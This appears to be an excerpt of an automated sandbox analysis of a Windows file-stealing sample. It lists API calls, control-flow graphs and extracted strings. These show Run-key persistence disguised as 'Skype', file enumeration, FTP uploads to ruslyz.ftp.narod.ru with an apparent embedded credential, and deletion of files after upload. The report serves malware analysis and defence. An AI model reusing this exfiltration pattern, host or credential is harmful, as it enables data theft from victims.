      • RegSetValueExA.ADVAPI32(?,Skype,00000000,00000001,?,00000005,?,?), ref: 006743D4
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(NULL), ref: 006743E6
      • InternetCloseHandle.WININET(00CC0FEC), ref: 00674413
      • InternetCloseHandle.WININET(00000000), ref: 0067441C
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067442D
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$A?$basic_string@$??0?$basic_string@$InternetV01@$?erase@?$basic_string@V12@$??1?$basic_string@??4?$basic_string@CloseFileHandleOpenValueY?$basic_string@fopenmemsetsprintf$??$?8ConnectCreateD@1@@std@@D@2@@0@DeleteDirectoryLocalMessageQuerySendTimeV01@@V?$basic_string@fgetc
      • String ID: $1qazse4rfv$NULL$Skype$Software\Microsoft\Windows\CurrentVersion\Run\$connect$cre folder$cs.exe$null$ruslyz$ruslyz.ftp.narod.ru$v_%d
      • API String ID: 1455528554-2122441541
      • Opcode ID: 213af85c790f58850bb175b3bc1171cc169ce18a881be8fc921a3f737d087e2c
      • Instruction ID: 058ad0b5af04f4d9f7f821182c2483d6033da36dac69d7b919a9c263789439da
      • Opcode Fuzzy Hash: 213af85c790f58850bb175b3bc1171cc169ce18a881be8fc921a3f737d087e2c
      • Instruction Fuzzy Hash: 1861E370644700AFD728EF64DC0EBAA3BA7AB48704F00941DF51D972E2DBB09988CF56

      Control-flow Graph

      APIs
      • PostQuitMessage.USER32(?), ref: 00674A6B
      • CreateWindowExA.USER32(00000000,edit,00000000,50A00804,0000000A,00000014,000003E8,000001F4,?,00000000,00670000,00000000), ref: 00674AAC
      • SetTimer.USER32(?,000003E8,000493E0,006741B0), ref: 00674ACC
      • BeginPaint.USER32(?,?), ref: 00674AEC
      • EndPaint.USER32(?,?), ref: 00674AF8
      • DefWindowProcA.USER32(?,?,?,?), ref: 00674B23
      • DefWindowProcA.USER32(?,00000111,?,?), ref: 00674B56
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: Window$PaintProc$BeginCreateMessagePostQuitTimer
      • String ID: edit
      • API String ID: 2127186440-2167791130
      • Opcode ID: 00d6fa56793c44f1ebe58671d36ccf6c18734e68c1da44a8afd97370d8d6d054
      • Instruction ID: 33b3fde21931028e5c382d804ba468cec619012ac5b889cdb20f3593a96f7c0e
      • Opcode Fuzzy Hash: 00d6fa56793c44f1ebe58671d36ccf6c18734e68c1da44a8afd97370d8d6d054
      • Instruction Fuzzy Hash: E341D571254208ABD318DF78EC5EFBB37AAEB49721F40850EF50E8A2D1DF619C508795

      Control-flow Graph

      APIs
      • LoadStringA.USER32(?,00000067,006783E8,00000064), ref: 00671399
      • LoadStringA.USER32(?,0000006D,00678380,00000064), ref: 006713A5
        • Part of subcall function 00674470: LoadIconA.USER32 ref: 006744A9
        • Part of subcall function 00674470: LoadCursorA.USER32(00000000,00007F00), ref: 006744B6
        • Part of subcall function 00674470: LoadIconA.USER32 ref: 006744DF
        • Part of subcall function 00674470: RegisterClassExA.USER32(?), ref: 006744EA
      • CreateWindowExA.USER32(00000000,00678380,006783E8,00CF0000,00000064,00000064,000004B0,00000258,00000000,00000000,?,00000000), ref: 006713DA
      • ShowWindow.USER32(00000000,00000000), ref: 006713ED
      • UpdateWindow.USER32(00000000), ref: 006713F4
      • LoadAcceleratorsA.USER32(?,0000006D), ref: 006713FD
      • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00671416
      • TranslateAcceleratorA.USER32(?,00000000,?), ref: 0067143B
      • TranslateMessage.USER32(?), ref: 00671446
      • DispatchMessageA.USER32(?), ref: 0067144D
      • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0067145E
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: Load$Message$Window$IconStringTranslate$AcceleratorAcceleratorsClassCreateCursorDispatchRegisterShowUpdate
      • String ID:
      • API String ID: 2655949961-0
      • Opcode ID: b6dec6ad48cfe68cda134db7470a2456bf6aa731a33bbb9fbfa9369dd6906862
      • Instruction ID: e6f1639c80c78f48b64e3b749f12670d1276b2f10fd916f8671b223a2b7c6623
      • Opcode Fuzzy Hash: b6dec6ad48cfe68cda134db7470a2456bf6aa731a33bbb9fbfa9369dd6906862
      • Instruction Fuzzy Hash: 0C21B6323807057BE310DB6CDC4AF9B73AAAB85F14F448405F748AB1C1EBB1E9458B65

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 249 674470-6744f4 LoadIconA LoadCursorA LoadIconA RegisterClassExA
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: Load$Icon$ClassCursorRegister
      • String ID: 0$m
      • API String ID: 4202395251-432128193
      • Opcode ID: 92bfdaef2626f0010a0f3d02303da8c174079a85dbf1070fbc220080576f4497
      • Instruction ID: 29f58112f5f1a6abff0ddf2fb9db82e99e4524fcdd1bb691235f48a9b63a6c63
      • Opcode Fuzzy Hash: 92bfdaef2626f0010a0f3d02303da8c174079a85dbf1070fbc220080576f4497
      • Instruction Fuzzy Hash: F901FBB0809300AFE300DF64D91870BBFE5BB88704F80591DF49897281D7BA85088F96

      Control-flow Graph

      APIs
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,26DFE5F7,00000000,00675699,000000FF,00672550,?,?,?,26DFE5F7), ref: 00671322
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,26DFE5F7), ref: 00671332
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,26DFE5F7), ref: 0067133F
      • SendMessageA.USER32(00020424,0000000C,00000000,00000000), ref: 00671351
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,26DFE5F7), ref: 00671363
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@Y?$basic_string@$??1?$basic_string@A?$basic_string@MessageSendV01@@
      • String ID:
      • API String ID: 1882697028-0
      • Opcode ID: cf8e06204b1622231198e4fff93f93fa06a6819f8673ef61c4339dd3fe2c331e
      • Instruction ID: c57ae5645f241763619de473df01676ac6d10cddf4e2c559c28caadcab9b6af0
      • Opcode Fuzzy Hash: cf8e06204b1622231198e4fff93f93fa06a6819f8673ef61c4339dd3fe2c331e
      • Instruction Fuzzy Hash: B1011D71184B41EFD318CF54ED09B167BE6F748B21F40861DF56A872D0DB755844CB22

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 410 672687-67268e 411 672690-672698 410->411 412 672a20-672a35 FindNextFileA 411->412 413 67269e-67273b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FindFirstFileA 411->413 412->411 414 672a3b-672b01 FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA 412->414 415 672741-672749 413->415 416 67288e-67289f FindNextFileA 413->416 433 672b07-672b10 414->433 434 6734e0-67355a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 call 674bfc 414->434 415->416 418 67274f-672757 415->418 416->412 419 6728a5 416->419 418->416 421 67275d-67288b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 418->421 422 6728b0-6728b8 419->422 421->416 423 6728be-6728c6 422->423 424 672a09-672a1a FindNextFileA 422->424 423->424 427 6728cc-6728d4 423->427 424->412 424->422 427->424 430 6728da-672a06 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 427->430 430->424 436 672b18-672b29 433->436 438 672c93-672cbb ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 436->438 439 672b2f-672b9f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 436->439 443 672cc1-672d1c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 438->443 444 67334f-673367 438->444 441 672bd4-672c8e ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA 439->441 442 672ba1-672bd2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 439->442 466 67333d-67334b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 441->466 442->441 442->442 448 672d53-672dff ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 443->448 449 672d1e 443->449 446 672b12 444->446 447 67336d-67336f 444->447 446->436 447->434 451 673375-673394 memset 447->451 453 672e01-672e16 fgetc 448->453 452 672d20-672d51 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 449->452 455 673396 451->455 456 6733be-67342c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 RegOpenKeyExA RegSetValueExA RegCloseKey 451->456 452->448 452->452 457 672e27-672e36 453->457 458 672e18-672e24 fputc 453->458 460 6733a0-6733bc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 455->460 456->434 471 673432-6734da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z memset ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateProcessA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 456->471 462 672fa6-672fa9 457->462 463 672e3c-672ebf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 fclose ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 457->463 458->457 460->456 460->460 462->453 465 672faf-672fcd fclose * 2 462->465 472 672ef4-672fa3 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 463->472 473 672ec1-672ef2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 463->473 469 673336 465->469 470 672fd3-67304e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 465->470 466->444 469->466 474 673083-673171 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 470->474 475 673050-673081 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 470->475 471->434 472->462 473->472 473->473 478 6731a6-673247 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 474->478 479 673173-6731a4 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 474->479 475->474 475->475 480 673283-673330 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 478->480 481 673249 478->481 479->478 479->479 480->469 480->470 483 673250-673281 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 481->483 483->480 483->483
      APIs
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 006726B6
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,0067660C), ref: 006726CE
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90 ref: 006726E3
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006726F8
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067270D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?), ref: 00672724
      • FindFirstFileA.KERNEL32(00000000), ref: 0067272B
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 00672775
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?,00000000,00676378), ref: 0067278D
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,?,?,?,?,00000000,00676378), ref: 006727A8
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(00000000), ref: 006727CB
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006727E0
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006727F5
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067280A
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 0067282D
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 00672850
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(?), ref: 00672880
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,26DFE5F7,00000000,00675699,000000FF,00672550,?,?,?,26DFE5F7), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,26DFE5F7), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,26DFE5F7), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00020424,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,26DFE5F7), ref: 00671363
      • FindNextFileA.KERNEL32(00000000,?), ref: 00672897
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 006728F2
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?,00000000,00676378), ref: 0067290A
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,?,?,?,?,00000000,00676378), ref: 00672924
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(00000000), ref: 00672947
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067295B
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672970
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672985
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 006729A8
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?), ref: 006729CB
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(?), ref: 006729FB
      • FindNextFileA.KERNEL32(00000000,?), ref: 00672A12
      • FindNextFileA.KERNEL32(?,?), ref: 00672A2D
      • FindClose.KERNEL32(00000000), ref: 00672A40
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00672A52
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00672A67
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d,FFFFFFFF,00000000), ref: 00672A82
      • sprintf.MSVCR90 ref: 00672A89
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00672AA2
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672AB6
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(\skype,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00672ABF
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00672AD1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00672AE3
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 00672AF0
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00672B3B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00672B51
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00672B61
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,%s\%s,00000000), ref: 00672B76
